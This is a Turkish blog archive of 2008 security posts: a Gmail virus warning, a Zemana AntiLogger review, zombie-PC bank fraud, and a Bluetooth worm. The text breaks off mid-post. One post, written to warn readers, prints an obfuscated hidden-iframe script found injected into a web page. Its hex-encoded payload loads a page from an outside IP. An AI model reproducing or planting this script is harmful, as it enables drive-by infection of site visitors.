Etiketler ‘Virüs’

Gmail bir harikasın…

Çarşamba, Ağustos 6th, 2008

Tüm e-posta hesaplarımı Gmail ‘de toplatığımı sizlere  Gmail adresinize tüm e-mail hesaplarınızı girin… Spamdan kurtulun 6GB alan kullanın makalemde bahsetmiştim. Gmail ‘i ilk zamanlarından beri kullanmaktayım …

O zamanlar sadece özel davetiye ile Gmail üyesi olabiliyordunuz… O zamanlar Gmail ana sayfasında 10 rakamlı sürekli artan MB değeri yoktu 6 rakamlıydı :) Neyse .. Sizlere bugün bahsetmek istediğim Gmail’in güvenlik özelliklerinden birisi… Bugün maillerime baktığımda Gmail hesabımda şöyle bir maile denk geldim…

İLETİ SUNUCUDA BIRAKILDI :  “***SPAM*** CNN.com Daily Top 10″

Daily Top 10 (mainosso@burke-center.org) adlı kişiden gelen “***SPAM*** CNN.com Daily Top 10″ iletisi bir virüs veya şüpheli bir eklenti içeriyordu. Bu nedenle, teakolik-@-teakolik.com hesabınızdan indirilmeyip sunucuda bırakıldı.

Daily adlı kişiye cevap yazmak istiyorsanız, sadece yanıtla düğmesine tıklayın, Daily adlı kişiye iletinizi yollayın.
Teşekkürler,


Gmail Ekibi

Bu ne demek oluyor ?  Diye soranlarınız olursa şöyle açıklayabilirim. Birisi yada birileri bana Virüslü bir mail gönderdiği zaman Gmail bu maili sunucumda bırakıyor ve indirmiyor. Sonrada böyle bir uyarı maili gönderiyor. Böylelikle kullanıcı virüslü e-posta dan kurtulabiliyor… Tek yapması gereken maili sunucudan direkt silmek…

Önceden PC mize maillerimizi indirirdim eğer virüslü bir mail geldiyse oda PC ye inerdi sonra çalıştırınca güm…. Şimdi ise Gmail ‘in bu özelliği sayesinde kullanıcı maili daha indirmeden virüslü olduğunu görüyor Gmail tarafından uyarılmış oluyor…

Gerçektende harikasın teşekkürler Gmail ….

Zemana AntiLogger Program Testi Kullanımı-3

Çarşamba, Haziran 4th, 2008

Zemana AntiLogger Program Testi -2 makalemde sizlere programın genel özelliklerinden bahsettim biraz uzunca oldu ama içim rahat en basit kullanıcının bile rahatlıkla anlayabileceği şeklide anlatmaya çalıştım.

Zemana Antilogger programımızı demo versiyonunu buradan indirebilirsiniz. Demo versiyonumuzda hiçbir kısıtlama yok. Programın her özelliğini kullanabilmektesiniz. Programımızı kurduktan sonra bize 15 günlük olarak sunulmakta. Programımızı kurduk ve arayüzü karşımıza geldi. Sol menüde gördüğünüz gibi koruma sekmesinde

  • Anti-KeyLogger
  • Anti-ScreenLogger
  • Anti-WebcamLogger
  • Anti-ClipboardLogger
  • Sistem savunma

Özelliklerini (1) görebilmekteyiz. Sol menüdeki bu özellikleri tıkladığımız zaman sağ tarafta karşımıza bu özelliği DEVRE DIŞI BIRAKMAK (3) veya ETKİNLEŞTİRMEK (2) için AÇ ve KAPAT butonlarını görmekteyiz. Her özellik için Açma yani Aktif etme ve Kapatma yani Devre dışı bırakma işlemlerini gerçekleştirebiliyoruz. Ayrıca alt tarafta (4) en son izin verdiğimiz programın adını ve en son engellenen programın adını görebilmekteyiz.

Bu açıdan baktığımızda programın kullanımı çok basit ve rahat yapılmış özelliklede piyasadaki birçok Firewall ve Anti-virüs programı ile kıyaslandığında çok daha basite indirgendiğini görebilmekteyiz. Kullanıcı için geyet basit tasarlanmış ben kullanım kolaylığı ve tasarım için Zemana yazılımcılarına tam puan verdim diyebilirim.

Sol menüdeki GÖREVLER sekmesine geldiğimiz zaman

  • Kurallar
  • Karantina
  • Kayıtlar

Menüsünü görmekteyiz. Bu menü içerisinde Kurallar menüsü WebCam’inizi klavyenizi yani güvenlik unsurları olarak programın gördüğü ve takip ettiği sistemlerimizi kullanan programları görebilmekteyiz. Zaten Zemana programınızı kurduğunuz zaman Eğer WebCam programınızı açarsanız WebCam’inizi kullanmak isteyen bir program olduğunu size uyarı olarak gösterecektir. Bu uyarı ekranında izin verdiğiniz programları KURALLAR, KAYITLAR, KARANTİNA menülerinden görebilmekteyiz. Eğer yanlışlıkla izin verirseniz bu menüde sağ taraftan izin verdiğiniz dosyaya sağ tıklayıp bu kuralı sil yaparak listeden kaldırabilmektesiniz. Ayrıca tüm programlarınıza izin verdikten sonra bu liste üzerinde yine sağ tıklayıp kuralları kayıt et yaparak bir dosya halinde kayıt edebilir daha sonradan hani olurda format felan atarsanız PC ‘nize tekrar programı yüklediğinizde izin verdiğiniz programları bu listede yine sağ tıklayıp kuralları yükle diyerek önceden kayıt etmiş olduğunuz kural listesini alabilirsiniz. Bu sayede her program kuruşunuzda tek tek Zemana programından izin ver yada engelle yapmanıza gerek kalmayacaktır. Karantina bölümünden şüpheli dosyalarınızı ve Kayıtlar bölümünden de tüm izin verilenleri vaya engellenenleri görebilmektesiniz.

Sol menümüz içerisinde son olarak SERVİSLER sekmesini görebilmekteyiz bu menü içerisinde

  • Lisans
  • Güncellemeler
  • Destek

Menülerini görebilmekteyiz. Bu menülerden ilki Lisansı tıkladığımız zaman sağ tarafta Lisans anahtarımız ile ilgili detaylar karşımıza gelmekte. Bu detaylar arasında eğer DEMO yani 15 günlük DENEME sürümünü kullanıyorsak kaç günümüz kaldığını lisans girdiysek lisans bitiş tarihini ürün anahtarımızı ve Lisans anahtarı girmek için olan LİSANS ANAHTARI bölümlerini görebilmekteyiz.

Zemana yetkilileri sağolsunlar programı test edebilmem için bana 1 yıllık bir lisans anahtarı gönderdiler LİSANS anahtarı bölümüne geliyorum lisans anahtarımı giriyorum ve LİSANSI YENİLE butonuna basıyorum. Program kendi internet sayfasına bağlanıyor ve lisans anahtarımı kontrol ediyor lisansımı doğru girip girmediğimi onayladıktan sonra karşıma

Aktivasyon başarıyla tamamlandı.
Lisans anahtarınız başarıyla yüklenmiştir.
Lisanslı Zemana antilogger yazılımı kullandığınız için teşekkür ederiz.

Uyarısı geliyor ve tamam diyerek programa lisansımızı girmiş oluyoruz. Lisansımı sağdaki resimde de gördüğünüz gibi aktif ettikten sonra kaç gün kaldığını ve lisans türünü görebilmekteyiz. Lisansı bana programı test etmem için gönderen Zemana yöneticilerine tekrar teşekkür edip program tanıtımımıza devam edeyim.

Güncellemeler sekmesinde ise sağ tarafta GÜNCELLEMELERİ KONTROL ET butonunu görebilmekteyiz. Arada bir bu butona tıklayarak güncelleme varmı diye kontrol edebilirsiniz. Eğer varsa zaten otomatik olarak yükleyecek ve sisteme kuracaktır.

Destek sekmemizde ise program hakkında destek alabilmemiz için her türlü seçenek eklenmiş. Destek Al butonuna basarak internet sayfalarındaki DESTEK türlerinden istediğimizi seçip yardım alabilmekteyiz.

Son olarak sizlere AYARLAR menüsünden bahsetmek istiyorum.

SAĞ bölümde ÜST taraftaki AYARLAR Sekmesine tıkladığınız zaman karşımıza gelen pencerede

GENEL :

Bu bölümde TÜRKÇE ve İNGİLİZCE olarak 2 ayrı dil seçeneğini görmekteyiz. Program bir Türk yapımı olduğu için şükürler olsun ki TÜRKÇE dil desteği mevcut. Ayrıca İngilizce seçeneğinide kullanabilmektesiniz.

Windows açıldığında otomatik olarak başlat :

Bu seçenek standartta işaretli gelir. Bilgisayarınızı açtığınız zaman programın otomatik olarak başlaması için kullanılır. Eğer ki yok ben korumamı kendim çalıştıracağım yada kendi kendimi korurum gelen virüsün kafasını kırarım diyorsanız o zaman başka boşaltrsınız siz programı çift tıklamadığınız sürece çalışmaz .

NOT: Tavsiye etmem :)

Uyarı verildiğinde KURAL oluştur ve HATIRLA seçeneğini işaretle :

Eğer ki bir programdan yada dosyadan Zemana AntiLogger programınız şüphelenirse hemen size uyarı ekranı çıkartacaktır. Bu uyarı ekranında bir seçenek var Kural oluşturabilmeniz için yani aklında tutacak bir daha size sormayacak. O kutucuk işaretli gelmesi için

NOT: Böylelikle zırt pırt sürekli uyarı vermez bir dosyaya izin verirseniz yada engellerseniz bir daha size sormadan işlemi gerçekleştirecektir.

Dijital imza bilgisi onayını internetten kontrol et :

Eğer ki dijital imzalı bir işlev bilgisayarınızda çalışacaksa ve bu imza geçerli olarak programın karşısına gelecekse program internet üzerinden bu imza yetkisi kontrol edecek ve sahte olup olmadığını size bildirecek. Gerçek bir imza ise o zaman sorun çıkmayacaktır.

NOT : Bu önemli bir özellik Zemana ‘ya bu özellik için teşekkür ederim TAM güvenlik budur işte…

Anti-SSLLogger Teknolojisini aktif et :

Bu seçeneğimizden daha önce sizlere bahsetmiştim. Dünyada bir ilk olan SSL logger ile SSL sistemimiz ve bilgisayarımız arasındaki veri trafiğini kontrol etmiş olacaktır.

Zemana Beyaz listesi teknolojisini ZWLIST aktif et :

Bu seçenek ise ZEMANA tarafından test edilip onaylanmış olan programlar ve dosyalar listesidir. Bu liste sayesinde güvenilen programları Zemana sizin yerinize yönetecektir.

Güncellemeleri Kontrol et ve haberdar et :

Bu seçenek sayesinde program otomatik olarak belirli aralıklarla internet üzerinden Zemana Antilogger programınızdaki güncellemeleri yükleyecektir ve size bildirecektir.

Çıkmadan önce onay iste :

Bu sayede programı yanlışlıkla kapatırsanız program kapanmadan önce size uyarı verecek ve kapatmak istediğinize emin misiniz diye soracaktır. Aksi taktirde program kapandığında güvenlik zaafiyeti ortaya çıkacaktır.

GÜVENLİK EYLEMLERİ :

Bu sekmede güvenli sayılan veya sertefikalı olan sistem girişlerinin denetimi bulunmaktadır. Bu denetim arasında..

Microsoft sertefikalı uygulamalara izin ver :

Microsoft ürünlerine hiç sesini çıkartmaz ve istediklerini yapmalarını sağlar. Eğer ki uyarı ver ‘i işaretlerseniz bilgisayarınızdaki her microsoft ürünü içinde sizi uyaracaktır.

Diğer sertefikalılar :

Bu ise internet üzerinden microsoft haricindeki firmaların güvenlik sertefikasına sahip olanlara izin vermenizi sağlar aksi taktirde eğer uyarı ver i işaretlerseniz gerçerli bir sertefikaya sahip olsalar dahi size programımız Zemana uyarı verecektir.

Sertefikasız :

Bu bölümde ise sertefikası olmayan yani güvenlik denetimi onaylanmamış bir işlev karşımıza gelirse program hemen bizi uyaracaktır. Aksi taktirde SORU SORMA işaretlerseniz bilgisayarınız herkeze açık hale gelecektir.

Engelleme sırasında Antilogger hangi eylemi gerçekleştirsin :

Bu bölümde uygulamanın tüm işlevlerini durdur ve uygulamayı sonlandır işaretli olarak gelmekte bir program şüpheli davrandığı zaman Antilogger’imiz programı duvara çarpmışa benzetir. Nerede ne yapıyorsa hangi dosyayı nereye kopyalayacaksa yada erişecekse Antilogger DUR diyip karşısına DUVAR çarpmış gibi programı bloke edecek siz izin verene kadar erişimini yasaklayacaktır. Katı ve sağlam bir güvenlik diyebilirim. Diğer seçeneği işaretlerseniz programın eğer zararlı bir tarafı varsa onu sadece bloke edecektir. Ama ne olur ne olmaz bence standart ayarı kalsın.

KAYIT AYARLARI :

Bu sekmede ise programımız karşılaştığı tüm eylemlerini ve işlemleri kayıt etmesi için tasarlanmıştır.

Tüm aktiviteleri kayıt et :

İşaretli ise ne olup ne bitiyorsa hepsini bir dosyada tutacaktır.

Sadece kullanıcı onayı istenen aktiviteleri kayıt et :

İşaretli ise program kullanıcıya birşey sorduğu zaman ne olduysa kayıt eder hiçbirşey sormadığı zaman programın neye onay verdiğini yada ne yaptığını göremeyeceksiniz.

Hiçbir aktiviteyi kayıt etme :

Adı üstünde anlamışsınızdır. Program kayıt tutmayacaktır.

Hemen alttaki Maximum log count değeri ise hafızasında tutacağı LOG dosyasının büyüklüğüdür. Eğer uzun aralıklarla programın loglarını inceleyecekseniz değeri biraz uzun tutmanız gerekecektir.

Buraya kadar gördükki programımız çok basit ve rahat kullanımı olan hemene hemen her kullanıcıya hitap edecek bir arayüze sahip bir program gerçektende işe yarar ve benzeri olmayan bir program diyebilirim.

Ben programı COMODO Firewall programı ve ANTIVIR anti-virüs programı ile test ettim şimdiye kadar hiçbir uyumsuzluğa rastlamadım. Antilogger programımız Zemana bazen Comodo Firewall programıma takıldı bazende Comodo Zemana AntiLogger programıma takıldı. İkisinden de birbirlerine izin verdim ve bir sıkıntı kalmadı. Ayrıca Antivir Virüs programım da Antilogger programıma takıldı tabiki onada izin verdikten sonra sistemimde 5 gündür aktif ve süper şekilde çalışmakta..

Programın kurulumu için :

İŞLETİM SİSTEMLERİ :

Windows 2000 SP4 / Windows XP / Windows Vista v 32 bit sürümlerinde kullanabilmektesiniz. Win9x serisinde çalışmayacaktır. Zaten Win 9X serisi kullanan varmı hala bilmem :)

SİSTEM ÖZELLİKLERİ :

Minimum 50 MB Hard Disk boş alanı
Minimum 128 MB Ram
Minimum IntelPentium 300 MHz

Gördüğünüz gibi program çok fazla birşey istemiyor hatta çok azıyla bile yetinebiliyor. Sebebi ise belli sistem taraması yok tamamen benim yapay zeka dediğim Zemana firmasınında Sezgisel koruma dediği teknikle çalışması ve programın bir Virüs databasesi olmaması sistemi rahatlatmasına ve kasmadan kullanmamıza olanak vermekte. Bir Anti-Virüs programını gözümüzün önüne getirdiğimizde tarama esnasında ne kadar çok işlemci ve ram kullandığını düşünün ama bu Zemana’da yok Zemana sisteminizi sürekli kontrol eder ve sisteminiz çok rahat çalışır.

Teknoloji bu işte sürekli bizi kastıracağına bizi kastırmadan makinamıza ek yük getirmeden çalışsın ne güzel değil mi ? Bugüne kadar hangi program çıktıysa yok RAM yetmiyor yok işlemci az…. Bilmemne bilmemne…

Zemana Antilogger programını yazan arkadaşların beyilerine ve parmaklarına sağlık diyorum helal …

ZEMANA :

Zemana Web Sayfası : http://www.zemana.com

Zemana download : 15 Günlük deneme sürümü

Zemana Uyumlu : Anti-Virüs ve Firewall Listesi

Zemana Güvenlik : Güvenlik testleri

Zemana İletişim : Telefon, E-mail, adres bilgileri

Zemana Lisans : Lisans satın almak

Zemana Destek : Destek sayfası

Zemana Hakkında : Zemana Kimdir ?

Zemana Blog : Güvenlik Açıkları ve diğer haberler

Zemana Kullanımı : Tatıtım filmi

ve son olarak programın ücreti ?

Home Birim Fiyat Toplam
Tek Kullanıcı Lisansı 39.50 USD 39.50 USD Satın Al
Home Office Birim Fiyat Toplam
3 Kullanıcı Lisansı 27.50 USD 82.50 USD Satın Al
Small Business Birim Fiyat Toplam
10 Kullanıcı Lisansı 22.00 USD 220.00 USD Satın Al
Enterprise Birim Fiyat Toplam
50 Kullanıcı Lisansı 15.80 USD 790.00 USD Satın Al

Tamamen Türk yapımı ve sistemi kastırmayan güvenliğimizi en üst düzeye çıkartan ve dünyadaki birbaşka ilkleri gerçekleştiren bu program için Zemana çalışanlarına teşekkürler..

Zemana AntiLogger Program Testi -2

Çarşamba, Haziran 4th, 2008

Zemana AntiLogger Program Testi makalemin devamı olarak sizlere tekrar merhaba program özelliklerinden bahsetmeye devam edelim.

Anti-ScreenLogger Nedir ?

Hackerler günümüz teknolojisinde artık sadece klavyeyi kayıt almanın dışında ekran görüntünüzüde kayıt altına alabilmekteler. Peki ekran görüntümüzü nasıl alırlar ? Sisteme bulaştırdıkları bir program daha doğrusu bir trojan sayesinde ekranda gördükleriniz bir kamera görüntüsü gibi kayıt olur. Özelliklede internet üzerinden alış-veriş yaparken banka bilgilerinizi girerken ve kredi kartınızı kullanırken ekranda bastığınız her tuş gözüktüğü için ekran görüntüsünü kayıt altına alarak şifrelerinizi ele geçirebilirler. Tabi bundan sonrası onlar için çok basit… Ekran görüntünüzü sizin haberiniz olmadan kendi bilgisayarlarınıza kayıt edip sonrada bir güzel şifrelerinizi ele geçirebilmekteler. Sanki bir video ilermiş gibi yaptığınız herşey hacker’in bilgisayarına gider ve bilgisayarınızdaki tüm işlemleri gözler önüne sermiş olurlar. Zemana programında Anti-ScreenLogger özelliği sayesinde ekran kayıtlarınızı ve ekran görüntülerinizi çalamayacaklar… Zemana bunun içinde geliştirilmiş ve kullanıcının ekran görüntüsünün kayıt altına alındığını gördüğü anda sistemi durduracaktır ve size uyarı verecektir.

Anti-ClipboardLogger Nedir ?

Bu özelliği ise hemen hemen herkezin kullandığı COPY - PASTE işlevi için geliştirilmiş. Genelde forumlarda dolaşırken yada birşeyler yazarken bir yerden başka bir yere COPY yani Kopyala ve PASTE yapıştır işlevini çok kullanırız. Aslında bu işlev çok işe yarar fakat kötü niyetli kişiler sizin Kopyala ve yapıştır yaptığınız bilgileride malesef görebilmekteler. Mesela mail şifrenizi bir TXT dosyasına yazdınız. Mailinize girerken bu şifreyi kopyala yapıp sonrada Login ekranına Paste ile yapıştırırsınız. Bu işlev sırasında saldırgan sizin COPY PASTE ile aldığınız veriyi kopyalayabilmektedir. Tabi bu işlevide yaparken saldırgan sizi izliyorsa Zemana Anti-loggger saldırganın bilgilerinizi ele geçirmesini önlemekte…

Anti-SSLLogger Nedir ?

SSLLogger ise saldırganların aslında yeni geliştirdikleri bir sistemdir. SSL bağlantıları yüksek şifreleme ile verileri karşı sisteme aktarır. Saldırganlar SSL sistemini geçemedikleri için veri sizin bilgisayarınızda SSL e gönderilmeden yani SSL olarak şifrelenmeden önce veriyi çalabilmektedirler. SSL kullanan Banka, Server, FTP gibi işlevlerin önüne geçebilmek için tasarlanan zararlı programlar SSL protokolüne giden veriyi kopyalamaya çalışmaktadırlar. Fakat Anti-Logger programımız SSL protokolü üzerinden yaptığınız işlemleride koruma altına almakta.. Yani veri SSL olarak şifrelenmeden önce bir Badyguard gibi Zemana veriyi korur. Tabi bu daha önceden yapılmamış bir koruma sistemi işte Zemana Anti-Logger programı SSL korumasıyla dünyada bir ilki gerçekleştirdi.

Anti-WebcamLogger Nedir ?

Hackerlerin artık sıkça kullanmakta oldukları hatta ve hatta ayağa kadar düşüp lamerlerin bile artık milletin kameralarını izlemeye başladığı günümüz internet dünyasına birisinin haberi olmadan WebCam’ini açıp görüntülerini çekip internette yayınlayanlar bile var… Düşünsenize odanızda soyunurken bir anda WebCam açılıyor ve haberiniz bile olmadan sizi kayıt altına alıyorlar… Sonra o görüntülerle…. Düşünmek bile istemezsiniz. Bu güne kadar herkeze WebCam’inizi kullanmıyorsanız kapağını kapalı tutun diye uyarırdım artık Zemana kullananlar bunada ihtiyaç duymayacaklar. Anti-WebCamloggger WebCam’inizi kullanmaya çalışan tüm program ve dosyaları tek tek durdurup sizi uyaracaktır. Tabiki buda dünyada bir ilk…

Son olarak Sistem Savunma nedir ?

Bilgisayar sisteminize zarar verebilecek tüm işlevleri durduran bir sistem özelliklede bilgisayarınızın çekirdek dediğimiz dosyalarına bulaşmaya çalışan virüs ve trojanların önüne geçilebilmekte… Gerçi bu işlev hemen hemen birçok Anti-virüs ve Firewall programlarına adapte edilmiş durumda. Tabi zemana antilogger bunuda bize sağlayabilmekte….

Bu gecelikte bu kadar arkadaşlar yarın gece sizlere Zemana AntiLogger Program Testi -3 makalemi yazacağım…

Banka dolandırıcılığı ve mahkeme kararıyla ifadeniz alınacak.

Pazar, Mayıs 25th, 2008

Merhaba arkadaşlar bugün heyecanla bir telefon aldım. Bir arkadaşımı karakoldan aramışlar ve ifadesinin alınması için karakola çağırmışlar.

Arkadaş nedir ne değildir diye karakola gitmiş. Karakolda 2007 senesinde ŞANLIURFADA bir kişinin banka hesabından XXXXXXX YTL kaçırılmış ve internet üzerinden yapıldığı söylenmiş. Bunun üzerine dava açılmış davada araştırma sonucunda üzerine kayıtlı olan telefon numarasından o tarihte internete bağlanılarak oan kullandığı ip adresi ile para aktarımının gerçekleştirildiğini söylemişler.

Şimdi kısaca karakola çağırılıyorsunuz ve sizin bir hesap numarasından XXXXXX YTL çektiğinizi internet üzerinden bu işlemi yaptığınızı ve telefon numaranızın ip adresi takibi sonucunda size ulaşıldığı söylense ne yapardınız ?

Enteresan geldi değil mi ? Aslında çok basit bir cevabı var.. Zombi PC nedir ? Ne işe yarar ? Ne yapmalıyım ? -1 ve Zombi Kullanmak, Zombi PC ele geçirmek, Zombileştirmek -2 makalelerimi okuyanlarınız varsa bunun nasıl gerçekleştiğini bilirler. Arkadaşım tabi karakola verdiği ifadede şahısı tanımadığını internet kullanmayı tam bilmediğini ve bilgisayarla pek arası olmadığını ama evde bir bilgisayar olduğunu söylemiş. Zaten başkada diyecek birşey kalmıyor.

Şimdi bu ne demek ? Ne alaka ?

Aslında olay basit. Hemen hemen herkez internetten birşeyler indirmekte ve bilgisayarına birşeyler kurmakta.. Hatta bunu her gün yapar hale bile geldik. Birşeyler indiriyoruz birşeyler kuruyoruz kaldırıyoruz vs.. peki bilgisayarlarınız güvende mi ? İndirdiğiniz o dosyaları bir virüs programından geçiriyor musunuz ? Yada bir güvenlik duvarı kullanıyor musunuz ? Yada benim bilgisayarımda virüs programı var diyenler acaba bu virüs programı ne kadar yeterli işe yarıyor mu internette arayıp soranlarınız var mı ? Güncelleme alıyor musunuz ?

Şimdi diyeceksinizki Virüsle alakasını bulamadım. Alakası şudur ki hacker ler daha doğrusu Black Hacker dediğimiz kişiler internet üzerinden birilerine saldıran bankaları dolandıran insanların canlarını yakan tiplerdir. İşte bu tipler internete yerleştirdikleri virüsler ve trojanlarla sizin bilgisayarınızı ele geçirirler bilgisayarınız bir Zombi haline gelir. Sonrada sizin bilgisayarınızı kullanarak kötü işlerine sizide katarlar.. Ruhunuz bile duymadan başkalarının banka hesaplarını sizin bilgisayarınız üzerinden boşaldır sonrada bir güzel yerler…

Nasıl yani benim bilgisayarımı kullanarak mı yapacaklar ?

Evet yanlış duymadınız. İnternet üzerindeki virüslerin aslında bazıları ve trojanların tamamına yakını bu iş için hizmet etmekte. Özelliklede trojan kullanan birçok hacker insanların bilgisayarlarını kullanarak illegal işlerini yaparlar..

Öncelikle kendi ellerinizle Mp3 yada program indireyim derken bilinmedik yerlerden dosya indirerek sonrada o dosyaları çalıştırarak bilgisayarınızı teslim etmiş olursunuz. Eğer ki sisteminizde güncel ve düzgün bir antivirüs programı yoksa çatır çatır bilgisayarınızı ele geçirirler. Eğer ki bilgisayarınızda bir güvenlik duvarıda yoksa çatır çatır sizin ruhunuz bile duymadan kullanırlar. Sizin bilgisayarınızın internet bağlantısından başka bilgisayarları ele geçirmek yada bankaları dolandırmak için kullanıp sonrada çekip giderler. Suç araştırmaya alınır ve sizin bilgisayarınızdan yapıldığı ortaya çıkar. Sonrada polis aradığı zaman dersiniz ben ne yaptım ?

Aslında yaptığınız değil yapmadığınız birşey var. Bilgisayarınızı güvenli hale getirmek. Olmadık dosyalar programlar indirerek mp3 yada porno gibi şeyleri olmadık yerlerden indirip çalıştırarak hatta bir kaçak CD ciden bile aldığınız bir CD ile bilgisayarınıza virüs bulaştırarak birçok şey yapmış olursunuz. Sonrada polis kapınıza dayanır. Eğer ki böyle bir bilgisayar kullanıcıysanız ve olup olmadık şeylere evet diyor bilgisayarınızı güvenli tutmuyorsanız yapılacak tek şey var polise gidip ifade vermektir.

Peki sonra ?

Sonrası malum polis ifade aldıktan sonra evinizdeki bilgisayarı incelemek için el koyabilirler. Bilgisayarınız araştırılır ve sizin yapıp yapmadığınıza mahkeme karar verir.

Genelde bu tip durumlar pek sık görülmezdi ama şimdiden baş göstermeye başladı bile. Hacckerler için bulunmaz nimet virüslü bilgisayarlar da her geçen gün artmakta.. Sonrada….

Peki neler yapabilirim nasıl önlem alırım ?

Zombi PC nedir ? Ne işe yarar ? Ne yapmalıyım ? -1

Zombi Kullanmak, Zombi PC ele geçirmek, Zombileştirmek -2

Güvenlik ve teknoloji, Acaba Güvende misiniz ?

Güvenlik ve teknoloji, Güvenliğin öne çıktığı an.. -2

Güvenlik ve teknoloji, güvenliğin öne çıktığı devamı.. -3

Güvenlik ve teknoloji; Neler yapabiliriz ? -4

Güvenlik ve teknoloji; Neler yapabiliriz ? -5

Bu makalelerim işinize çok yarayacaktır. Benden söylemesi…

Yarın öbür gün polis sizinde ifadenizi almak isterse hiç şaşırmayın. Blogumda aylardır bas bas bu konu üzerine bağırmakta yazılar yazmaktayım. Siz siz olun güvenliğinizi sağlayın arkadaşlar.

HEUR/HTML.Malware Virüsüne dikkat…

Pazartesi, Nisan 21st, 2008

Merhaba arkadaşlar bir internet sayfasında surf yaparken denk geldim… HTML kodları arasına bulaşan bu virüsü bir kısım antivirüs programları algılamıyor malesef. Şuan deneme amaçlı kulllandığım Antivir programı hemen beni uyardı. Söylediğim gibi sörf yaparken denk geldim bu uyarıya.. Öncelikle birkaç antivirüs programı ile kontrol ettim ama yakalamadılar. Sadece Antivir mi yakalıyor ? O zaman bir yanlış anlaşılma olabilir dedim.

Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…

</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>

Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…

<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>

Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…

Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.

http://77.221.133.X/.if/go.html?[random_nr]

Scrip çalıştığında bu hale geliyor…

İp adresini sorguladığımda ise

Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the “-B” flag.

% Information related to ‘77.221.128.0 - 77.221.143.255′

inetnum: 77.221.128.0 - 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants mailto:abuse@infobox.ru
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: abuse@infobox.ru
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

% Information related to ‘77.221.128.0/19AS30968′

route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)

Script çalıştığında çıkan sonuç..

<iframe src=”http://77.221.133.X/.dif/go.php?sid=1″ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs değil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araştıracağım. Tabi öncelikle kendi sistemime bulaştırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile değildir….

SONUÇ :

En iyi virüs programı yoktur…

Birçok program iyidir fakat en iyisi diye bir belirleme yapamayız.

Bazıları anti-virüslerde iyidir trojanlarda zayıf bazıları trojanlarda çok iyidir fakat virüslerde zayıf bazılarıda güvenlik duvarında iyidir fakat diğer yönleri zayıf olabilir…

SYMBOS/Commwarrior.D Bluetooth ile bulaşan bir virüs …

Pazartesi, Nisan 14th, 2008

Son 1 haftadır notebook’umu şirkette açtığım anda pc’me 6260 telefonundan bluetooth ile bağlantı sağlamaya çalışan biri denk geliyor. Önceleri şirkettekilerden birisi benimle kafa buluyor sanıyordum her seferinde hayır deyip dosya aktarımını iptal ediyorum. Arada bir Bluetooth’umu açmak zorunda kaldığım zaman patır kütür dosya gönderiyor. Uyuz oldum tabi şirkettekilere tek tek soruyorum bu telefon kimin kim bana dosya gönderiyor diye baktım ki hiçkimse göndermiyor…

Sonunda bu telefonun kime ait olduğunu bulmak için dosya aktarımını kabul ettim. Dosyayı C:\Users\TEAkolik\Documents\Bluetooth\Inbox klasörüme kayıt ettim dosya aktarımı bitti anında virüs programım uyarı verdi. Virüs var diye…

Dosya aktarımı biter bitmez tekrar gönderdi tekrar ve tekrar her dakka başı bağlanıp tekrar dosya gönderiyor gönderdiği dosyaların adı

7ctmzslu.sis
i34pabg1ar4.sis
jgh6rglu.sis

Hepsi nokia uygulama dosyası.. Yani öyle bir virüs ki bluetooth açık ne bulursa kendini kopyalamak için dosya göndermeye çalışıyor.

Virüsü biraz araştırdım ve gördüm ki…

SymbOS.Commwarrior.D

isimli bu virüs çok da tehlikeli ve çokda zararlı bir virüs değil. Ne yaptığını tam olarak çözemedim ama anladığım kadarıyla şimdilik kendini mümkün olduğunca çok telefona kopyalamak için saniye başı dosya aktarımı yapmakta…

Eğer ki dosyayı alıpda YES e basarsanız size şöyle bir uyarı veriyor.

